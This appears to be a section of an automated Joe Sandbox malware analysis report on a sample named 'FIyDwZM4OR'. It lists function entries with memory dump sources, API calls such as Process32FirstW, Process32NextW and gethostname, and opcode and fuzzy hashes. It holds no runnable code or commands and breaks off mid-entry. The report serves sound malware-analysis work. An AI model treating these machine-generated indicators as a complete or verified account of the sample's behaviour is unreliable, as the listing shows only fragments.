                                                              • Source File: 00000000.00000002.1799911429.0000000007180000.00000040.00001000.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7180000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID: NextProcess32
                                                              • String ID:
                                                              • API String ID: 1850201408-0
                                                              • Opcode ID: c180f121446ad358d8dc5049b4aa98c8cb25557399d829cff32928623c46db68
                                                              • Instruction ID: 9d82e8658464e499b5b94a7a9e28de6a6b64eb1306943aa18909705056c9d116
                                                              • Opcode Fuzzy Hash: c180f121446ad358d8dc5049b4aa98c8cb25557399d829cff32928623c46db68
                                                              • Instruction Fuzzy Hash: 4D51D5FB1AC129BD719AA1855B54AF6662EE7CF330B328426B803D66C2E3C44F4D1871
                                                              Function 0717032A Relevance: 1.7, APIs: 1, Instructions: 245COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • Process32FirstW.KERNEL32(?,?,?,?), ref: 071703FE
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1799896809.0000000007170000.00000040.00001000.00020000.00000000.sdmp, Offset: 07170000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7170000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID: FirstProcess32
                                                              • String ID:
                                                              • API String ID: 2623510744-0
                                                              • Opcode ID: d3f2ab33e14112f8d181f67ef17e5f418c3b3e81fba475adf923497ce90dfca4
                                                              • Instruction ID: 99f531e81de40793988c2be4ebb1ec0736d5f1a23de457a58e0be30d4ec38e27
                                                              • Opcode Fuzzy Hash: d3f2ab33e14112f8d181f67ef17e5f418c3b3e81fba475adf923497ce90dfca4
                                                              • Instruction Fuzzy Hash: 2941A2FB26D321BE720A95811B649FB677EE5CB770B32843AF803D6582E3C44E499171
                                                              Function 07170315 Relevance: 1.7, APIs: 1, Instructions: 242COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • Process32FirstW.KERNEL32(?,?,?,?), ref: 071703FE
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1799896809.0000000007170000.00000040.00001000.00020000.00000000.sdmp, Offset: 07170000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7170000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID: FirstProcess32
                                                              • String ID:
                                                              • API String ID: 2623510744-0
                                                              • Opcode ID: b1663f456cfbbc6ddec9bb18cf54cf405b86a71380be597206fff18bdece15a2
                                                              • Instruction ID: 9a70c1da4cd5ccab11b4454dd586f7b9544c77da1d4a058f658528ca0ad99801
                                                              • Opcode Fuzzy Hash: b1663f456cfbbc6ddec9bb18cf54cf405b86a71380be597206fff18bdece15a2
                                                              • Instruction Fuzzy Hash: 2241A1FB26D321BD720A95412B649FB6A7EE5CB770B32853AF803D65C2E3C40E499171
                                                              Function 071801C8 Relevance: 1.7, APIs: 1, Instructions: 235COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1799911429.0000000007180000.00000040.00001000.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7180000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e97d33ce62f7a8715804478b32a8fe3a4415be346511b7ac93ce807d2e7a6a4d
                                                              • Instruction ID: fbdafddbb063464aa68597cdc9533b4508de4da314a5bb76153bcde23d0d9761
                                                              • Opcode Fuzzy Hash: e97d33ce62f7a8715804478b32a8fe3a4415be346511b7ac93ce807d2e7a6a4d
                                                              • Instruction Fuzzy Hash: 0441D4FB1AC129BD719BA1455B54AF6662EE7CB330B328426B807D66C2E3C44F4D1871
                                                              Function 07180178 Relevance: 1.7, APIs: 1, Instructions: 233COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • Process32NextW.KERNEL32(-00000052,?,?,?), ref: 0718040C
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1799911429.0000000007180000.00000040.00001000.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7180000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID: NextProcess32
                                                              • String ID:
                                                              • API String ID: 1850201408-0
                                                              • Opcode ID: 443bfc3f0e0a8101c6dbbbfa594b8e76fdb70585bbbb4daf906fe57126d0e1c3
                                                              • Instruction ID: a3e019c8f71e3fb8f8576b85b050ee9e6f8f6e4aee66b6f8992aaaaf1490b34b
                                                              • Opcode Fuzzy Hash: 443bfc3f0e0a8101c6dbbbfa594b8e76fdb70585bbbb4daf906fe57126d0e1c3
                                                              • Instruction Fuzzy Hash: 2A41B5FB1AC129BD719BA1855B54AF6662FE7CB330B328426B803D66C2E3C44F4D1871
                                                              Function 07180188 Relevance: 1.7, APIs: 1, Instructions: 231COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • Process32NextW.KERNEL32(-00000052,?,?,?), ref: 0718040C
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1799911429.0000000007180000.00000040.00001000.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7180000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID: NextProcess32
                                                              • String ID:
                                                              • API String ID: 1850201408-0
                                                              • Opcode ID: 0a896d7f93a86a2c78dc23a8702d6ad54a5ecf4063e7d6824baa58edd54d294f
                                                              • Instruction ID: 6cb0d3ba2691ba07b2d34168cfb17158d5de17453d0c268117fb2f1a5a9a5d5e
                                                              • Opcode Fuzzy Hash: 0a896d7f93a86a2c78dc23a8702d6ad54a5ecf4063e7d6824baa58edd54d294f
                                                              • Instruction Fuzzy Hash: 9F41B2FB1AC129BD719BA1455F54AF6662EE7CB330B328426B807D66C2E3C44F4D1871
                                                              Function 071801A9 Relevance: 1.7, APIs: 1, Instructions: 231COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • Process32NextW.KERNEL32(-00000052,?,?,?), ref: 0718040C
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1799911429.0000000007180000.00000040.00001000.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7180000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID: NextProcess32
                                                              • String ID:
                                                              • API String ID: 1850201408-0
                                                              • Opcode ID: 7bf43257381836fea34c9ada6cdc9a0caf031c83cfbf4ab6401441f29c81ebc7
                                                              • Instruction ID: 020d616f81a3301e6308c3931a08ee535aa76233b991317c4b5141126c161a36
                                                              • Opcode Fuzzy Hash: 7bf43257381836fea34c9ada6cdc9a0caf031c83cfbf4ab6401441f29c81ebc7
                                                              • Instruction Fuzzy Hash: B241E6FB2AD119BDB19AA1415F54AF7672FE7CB330B328026B803D66C2E3C40A4D5871
                                                              Function 0717034E Relevance: 1.7, APIs: 1, Instructions: 223COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • Process32FirstW.KERNEL32(?,?,?,?), ref: 071703FE
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1799896809.0000000007170000.00000040.00001000.00020000.00000000.sdmp, Offset: 07170000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7170000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID: FirstProcess32
                                                              • String ID:
                                                              • API String ID: 2623510744-0
                                                              • Opcode ID: f6b7e635e7897a50717a6e28f3f99158f8cf945fd68c58fd89985841f6a8027e
                                                              • Instruction ID: 4c85fc6885f0e7aa71365a9425a06af4c6855a55814f1b4ce936c50bbe3a70e2
                                                              • Opcode Fuzzy Hash: f6b7e635e7897a50717a6e28f3f99158f8cf945fd68c58fd89985841f6a8027e
                                                              • Instruction Fuzzy Hash: BC41B1EB26D321BD720A95811B649FB6A7EE5CB770B72813AB803D65C2E3C40E499171
                                                              Function 0717035E Relevance: 1.7, APIs: 1, Instructions: 220COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • Process32FirstW.KERNEL32(?,?,?,?), ref: 071703FE
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1799896809.0000000007170000.00000040.00001000.00020000.00000000.sdmp, Offset: 07170000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7170000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID: FirstProcess32
                                                              • String ID:
                                                              • API String ID: 2623510744-0
                                                              • Opcode ID: df667d58f4cc7174e752264305fc17019a4428643ef372edcb87040fb2699535
                                                              • Instruction ID: dbcb293054a1e211508a002ede72d308689eb61929e84956e92f6b69a44cf0a2
                                                              • Opcode Fuzzy Hash: df667d58f4cc7174e752264305fc17019a4428643ef372edcb87040fb2699535
                                                              • Instruction Fuzzy Hash: B141E3F726C321BE720A95811B659FB6A7EE5CB370B32813AF403D6682F3D40E499171
                                                              Function 071703DB Relevance: 1.7, APIs: 1, Instructions: 212COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • Process32FirstW.KERNEL32(?,?,?,?), ref: 071703FE
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1799896809.0000000007170000.00000040.00001000.00020000.00000000.sdmp, Offset: 07170000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7170000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID: FirstProcess32
                                                              • String ID:
                                                              • API String ID: 2623510744-0
                                                              • Opcode ID: 2ae4bcd7dd633c23bbbec349495778682825960ac04587c1ba34170699e01bfa
                                                              • Instruction ID: 4b1a1f77daf70cd0321ede10ccc9b88c8761325084a0dc73fe6b04ed0f8a638e
                                                              • Opcode Fuzzy Hash: 2ae4bcd7dd633c23bbbec349495778682825960ac04587c1ba34170699e01bfa
                                                              • Instruction Fuzzy Hash: 7841F3F726D321BD720A91811B649FBAA7EE5CB770B72813AF403D66C2F3C44A499171
                                                              Function 07170389 Relevance: 1.7, APIs: 1, Instructions: 202COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • Process32FirstW.KERNEL32(?,?,?,?), ref: 071703FE
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1799896809.0000000007170000.00000040.00001000.00020000.00000000.sdmp, Offset: 07170000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7170000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID: FirstProcess32
                                                              • String ID:
                                                              • API String ID: 2623510744-0
                                                              • Opcode ID: 384b30fd8b0712d73358fcb1ecb5dc2e9406929a1bf7667bcf5896ed690ad0f5
                                                              • Instruction ID: a75b80b96cd9cb908f1c4b41d549d6beed8df5ea816a0e956a56feabdf87afd5
                                                              • Opcode Fuzzy Hash: 384b30fd8b0712d73358fcb1ecb5dc2e9406929a1bf7667bcf5896ed690ad0f5
                                                              • Instruction Fuzzy Hash: BC41D3F726D321BD720A95811B659FA6A7EE5CF370B72813AB803D65C2F3C40E499171
                                                              Function 0717039C Relevance: 1.7, APIs: 1, Instructions: 201COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • Process32FirstW.KERNEL32(?,?,?,?), ref: 071703FE
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1799896809.0000000007170000.00000040.00001000.00020000.00000000.sdmp, Offset: 07170000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7170000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID: FirstProcess32
                                                              • String ID:
                                                              • API String ID: 2623510744-0
                                                              • Opcode ID: e2b26587daa9341169c10370702b67349df68046b43eaca52c674a50124e5f61
                                                              • Instruction ID: f7d37109b35df9879a2073420b97ca0a88a9f5a48b2ed318195b03c624baf8fa
                                                              • Opcode Fuzzy Hash: e2b26587daa9341169c10370702b67349df68046b43eaca52c674a50124e5f61
                                                              • Instruction Fuzzy Hash: D541F3F726D321BE720A95415B649FA7A7EE5CB370B32813AF803D65C2F3D40A499171
                                                              Function 071802AE Relevance: 1.7, APIs: 1, Instructions: 196COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • Process32NextW.KERNEL32(-00000052,?,?,?), ref: 0718040C
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1799911429.0000000007180000.00000040.00001000.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7180000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID: NextProcess32
                                                              • String ID:
                                                              • API String ID: 1850201408-0
                                                              • Opcode ID: 12f0484d0a5f0571ac0c59672eb1f128a27dd019bc4e8b8ea77e199fbcdd848d
                                                              • Instruction ID: 900c2da6adf7570b6da8033409ba5599468b9786e76fb26390f30cb3102233d8
                                                              • Opcode Fuzzy Hash: 12f0484d0a5f0571ac0c59672eb1f128a27dd019bc4e8b8ea77e199fbcdd848d
                                                              • Instruction Fuzzy Hash: 1141E6FB2AD119BDB19BA1415F54AF66B2EE7CF630B314026F803D65C2E3C44A4E5871
                                                              Function 071801FF Relevance: 1.7, APIs: 1, Instructions: 194COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • Process32NextW.KERNEL32(-00000052,?,?,?), ref: 0718040C
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1799911429.0000000007180000.00000040.00001000.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7180000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID: NextProcess32
                                                              • String ID:
                                                              • API String ID: 1850201408-0
                                                              • Opcode ID: b785e4ec19e32d4bd101bae6523dbff6ae6b785ecff52696753f00689e24bf9e
                                                              • Instruction ID: f03fafe1b1df397f5a9aa1ffacf8bd557f7c2e287e137032f34195e28f9b8bfb
                                                              • Opcode Fuzzy Hash: b785e4ec19e32d4bd101bae6523dbff6ae6b785ecff52696753f00689e24bf9e
                                                              • Instruction Fuzzy Hash: 8441A7FB2AC129BDB1DAA1415B549F6666EE7DB330F328436B803D66C2E3C40B4D5871
                                                              Function 071703BB Relevance: 1.7, APIs: 1, Instructions: 188COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • Process32FirstW.KERNEL32(?,?,?,?), ref: 071703FE
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1799896809.0000000007170000.00000040.00001000.00020000.00000000.sdmp, Offset: 07170000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7170000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID: FirstProcess32
                                                              • String ID:
                                                              • API String ID: 2623510744-0
                                                              • Opcode ID: 530f9838640e084a00132f441f189f4592d77f4003e33dff5b3e90419f252c2c
                                                              • Instruction ID: 83adb27c27da082e41d8f155a2946a1d8302a0c34785997fbd07d1e74de7ecfe
                                                              • Opcode Fuzzy Hash: 530f9838640e084a00132f441f189f4592d77f4003e33dff5b3e90419f252c2c
                                                              • Instruction Fuzzy Hash: A141DFF726C321BD720A95811B659F66A7EE5CF370B72813AB803D66C2F3C44A4991B1
                                                              Function 07180225 Relevance: 1.7, APIs: 1, Instructions: 186COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • Process32NextW.KERNEL32(-00000052,?,?,?), ref: 0718040C
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1799911429.0000000007180000.00000040.00001000.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7180000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID: NextProcess32
                                                              • String ID:
                                                              • API String ID: 1850201408-0
                                                              • Opcode ID: 039ae2bbdb75d59998a7d8273b5a545a6b4cb08e0e7ecbc7954e1308e6cee939
                                                              • Instruction ID: 3d90e3d7141c5bb1ece6e9074b26b067200ac8b4ff06adc94b97cbee389d774b
                                                              • Opcode Fuzzy Hash: 039ae2bbdb75d59998a7d8273b5a545a6b4cb08e0e7ecbc7954e1308e6cee939
                                                              • Instruction Fuzzy Hash: 523195FB2AD129BD71DBA1415B549F6662EE7CB330F328426B807D6AC2E3C40A4D1871
                                                              Function 07170408 Relevance: 1.7, APIs: 1, Instructions: 179COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • Process32FirstW.KERNEL32(?,?,?,?), ref: 071703FE
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1799896809.0000000007170000.00000040.00001000.00020000.00000000.sdmp, Offset: 07170000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7170000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID: FirstProcess32
                                                              • String ID:
                                                              • API String ID: 2623510744-0
                                                              • Opcode ID: 70bbd7eb39dee4ceaebe0d622edd1e113010ad998f687dc3607dc1e254018722
                                                              • Instruction ID: 8d8efec3e1faf0483d49ff5d330d2e32b231f95e1180152ed0f1d01ba5b26026
                                                              • Opcode Fuzzy Hash: 70bbd7eb39dee4ceaebe0d622edd1e113010ad998f687dc3607dc1e254018722
                                                              • Instruction Fuzzy Hash: 4831D2F726C321BD720A95815B658F66A7EE5CF370B72813AB403D66C2F7C04A49D1B1
                                                              Function 07180278 Relevance: 1.7, APIs: 1, Instructions: 176COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • Process32NextW.KERNEL32(-00000052,?,?,?), ref: 0718040C
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1799911429.0000000007180000.00000040.00001000.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7180000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID: NextProcess32
                                                              • String ID:
                                                              • API String ID: 1850201408-0
                                                              • Opcode ID: d48e780fba92e7a73a19b897a620c7e1cb08437e964298b012b793e9fa65003d
                                                              • Instruction ID: edfc561ae618b684001058b120dbcbbbee1bc0f0b932aeb057704cb8aea09d84
                                                              • Opcode Fuzzy Hash: d48e780fba92e7a73a19b897a620c7e1cb08437e964298b012b793e9fa65003d
                                                              • Instruction Fuzzy Hash: F731F7F729D119BE728BA1459F549FA672EE7CF230B35402AF803D65C2E3C40A4D5932
                                                              Function 07180240 Relevance: 1.7, APIs: 1, Instructions: 174COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • Process32NextW.KERNEL32(-00000052,?,?,?), ref: 0718040C
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1799911429.0000000007180000.00000040.00001000.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7180000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID: NextProcess32
                                                              • String ID:
                                                              • API String ID: 1850201408-0
                                                              • Opcode ID: af096c1b06efaa5469f3b4f9799a511c9e10c88dcb8e49522e61734e3a8ff3c4
                                                              • Instruction ID: 30bed38719fa880bb16bc41f42c84db9894a9096d2e17264d46a91875a54e0c1
                                                              • Opcode Fuzzy Hash: af096c1b06efaa5469f3b4f9799a511c9e10c88dcb8e49522e61734e3a8ff3c4
                                                              • Instruction Fuzzy Hash: 5F31A6FB2AD129BD719BA1455B549F6662EE7CB330F328026B803D66C2E3C40E4D1871
                                                              Function 00F44950 Relevance: 1.7, APIs: 1, Instructions: 170networkCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • gethostname.WS2_32(00000000,00000040), ref: 00F44AA4
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1798063925.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                              • Associated: 00000000.00000002.1798049500.0000000000E90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798063925.0000000001401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798063925.0000000001567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798063925.0000000001569000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798474818.000000000156C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.000000000156E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.00000000016EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.00000000017F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.0000000001803000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.00000000018E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.00000000018E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.00000000018F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798741507.00000000018F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798928316.0000000001AAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798944333.0000000001AAE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_e90000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID: gethostname
                                                              • String ID:
                                                              • API String ID: 144339138-0
                                                              • Opcode ID: 81ce2f86eb180d155036c76fd61a51c8c4260e9d18435a615c212937d039b22f
                                                              • Instruction ID: 6296f9123508bab70d0052bdbb431c2830a94942048a083eac4992694f54963c
                                                              • Opcode Fuzzy Hash: 81ce2f86eb180d155036c76fd61a51c8c4260e9d18435a615c212937d039b22f
                                                              • Instruction Fuzzy Hash: 7B518F71A047008BE7309E25DD497237AE4EF81329F14093DED8AA66D1E779F884FB12
                                                              Function 071802ED Relevance: 1.6, APIs: 1, Instructions: 150COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • Process32NextW.KERNEL32(-00000052,?,?,?), ref: 0718040C
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1799911429.0000000007180000.00000040.00001000.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7180000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID: NextProcess32
                                                              • String ID:
                                                              • API String ID: 1850201408-0
                                                              • Opcode ID: 31fd42b44e0bc56614ccbaf7a188a52a3f107778c70daadda7987f749a51a189
                                                              • Instruction ID: f5619cbdfb0e7c50af1a4ed7fa4e75daf4400c06f17c61a38c1dd5d072c4f00c
                                                              • Opcode Fuzzy Hash: 31fd42b44e0bc56614ccbaf7a188a52a3f107778c70daadda7987f749a51a189
                                                              • Instruction Fuzzy Hash: 713186FB2AD129BD719AA1419F549F6662EE7CF330B358426B803D66C2E3C44E4D5831
                                                              Function 07180305 Relevance: 1.6, APIs: 1, Instructions: 128COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • Process32NextW.KERNEL32(-00000052,?,?,?), ref: 0718040C
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1799911429.0000000007180000.00000040.00001000.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7180000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID: NextProcess32
                                                              • String ID:
                                                              • API String ID: 1850201408-0
                                                              • Opcode ID: 6b84db70e296f06aca77e796f031ec79e40f54acf3506946a6e75fbf42239ab0
                                                              • Instruction ID: bb42dd41d74258d96321c96ab6ebef46ba8f38fbe2b19bd7c8dcf30d488e41e8
                                                              • Opcode Fuzzy Hash: 6b84db70e296f06aca77e796f031ec79e40f54acf3506946a6e75fbf42239ab0
                                                              • Instruction Fuzzy Hash: DC21C7F72AD118BDA29BA1419B546F6672EE7CB230F358076B803D66C2E3C40B4D5931
                                                              Function 07180320 Relevance: 1.6, APIs: 1, Instructions: 117COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • Process32NextW.KERNEL32(-00000052,?,?,?), ref: 0718040C
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1799911429.0000000007180000.00000040.00001000.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7180000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID: NextProcess32
                                                              • String ID:
                                                              • API String ID: 1850201408-0
                                                              • Opcode ID: 7ffce72cbe27f1fe26f16b3abad05f46375b5b9759be7dc7574742d2e133b90f
                                                              • Instruction ID: 0c26bdc74699a1950b276068c5930ac2821ea54862db6f54886f1cc9300c6f1b
                                                              • Opcode Fuzzy Hash: 7ffce72cbe27f1fe26f16b3abad05f46375b5b9759be7dc7574742d2e133b90f
                                                              • Instruction Fuzzy Hash: 482195F72AD119BDB29AA1456B50AFA662DD7CB230F358026B803D66C2E3C40A4D5831
                                                              Function 07180331 Relevance: 1.6, APIs: 1, Instructions: 115COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • Process32NextW.KERNEL32(-00000052,?,?,?), ref: 0718040C
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1799911429.0000000007180000.00000040.00001000.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7180000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID: NextProcess32
                                                              • String ID:
                                                              • API String ID: 1850201408-0
                                                              • Opcode ID: fd7e9d1204111881ff8c28f9c2e590e920cedfb8c4fb849c3b9d40f087a9cbf9
                                                              • Instruction ID: 472f3f96261899071824522b07ef1e187b915488f205ce15cd168eaff386981b
                                                              • Opcode Fuzzy Hash: fd7e9d1204111881ff8c28f9c2e590e920cedfb8c4fb849c3b9d40f087a9cbf9
                                                              • Instruction Fuzzy Hash: B32184F62AD119BEB29AA1455F54ABA662DE7CB230F358036B803D66C2E3D40A4D1871
                                                              Function 07180401 Relevance: 1.6, APIs: 1, Instructions: 109COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • Process32NextW.KERNEL32(-00000052,?,?,?), ref: 0718040C
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1799911429.0000000007180000.00000040.00001000.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7180000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID: NextProcess32
                                                              • String ID:
                                                              • API String ID: 1850201408-0
                                                              • Opcode ID: 1b8632674b1b636ec42e3962d7d7bb6cb05996444ea32aad66ed2ab2269610b4
                                                              • Instruction ID: 3bc8eab31809cb1527d02b39e55d8b6f524ae5fbc501889427f7f258c67b99e9
                                                              • Opcode Fuzzy Hash: 1b8632674b1b636ec42e3962d7d7bb6cb05996444ea32aad66ed2ab2269610b4
                                                              • Instruction Fuzzy Hash: 952146F619D0147DA24791415F009F67B2DE7CB6307398466F842DB4C3E3C40E4E1571
                                                              Function 0718035B Relevance: 1.6, APIs: 1, Instructions: 107COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • Process32NextW.KERNEL32(-00000052,?,?,?), ref: 0718040C
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1799911429.0000000007180000.00000040.00001000.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7180000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID: NextProcess32
                                                              • String ID:
                                                              • API String ID: 1850201408-0
                                                              • Opcode ID: 7a9366e278b765ddc1bfba6f7b3bd4a09e53085da9b4eaf6e0d2fcf216da7860
                                                              • Instruction ID: 7cdd9520181289e8910e2969dd8974fe2073c18e56df2f89e107549a4348b176
                                                              • Opcode Fuzzy Hash: 7a9366e278b765ddc1bfba6f7b3bd4a09e53085da9b4eaf6e0d2fcf216da7860
                                                              • Instruction Fuzzy Hash: ED11D6FA29D119BE729AA1415F50AFA662DD7CF730B36806AF803D75C2E3C40E4E1831
                                                              Function 0718039B Relevance: 1.6, APIs: 1, Instructions: 106COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • Process32NextW.KERNEL32(-00000052,?,?,?), ref: 0718040C
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1799911429.0000000007180000.00000040.00001000.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7180000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID: NextProcess32
                                                              • String ID:
                                                              • API String ID: 1850201408-0
                                                              • Opcode ID: 40ea675f4b61bb987d361be100f085bd2ec8f5d86b9a00a34460bf7dd23dbd36
                                                              • Instruction ID: e6aa03a7040e240c0ea76571dacb833b7e5d969ce0d1a8de4002db15cc3110d7
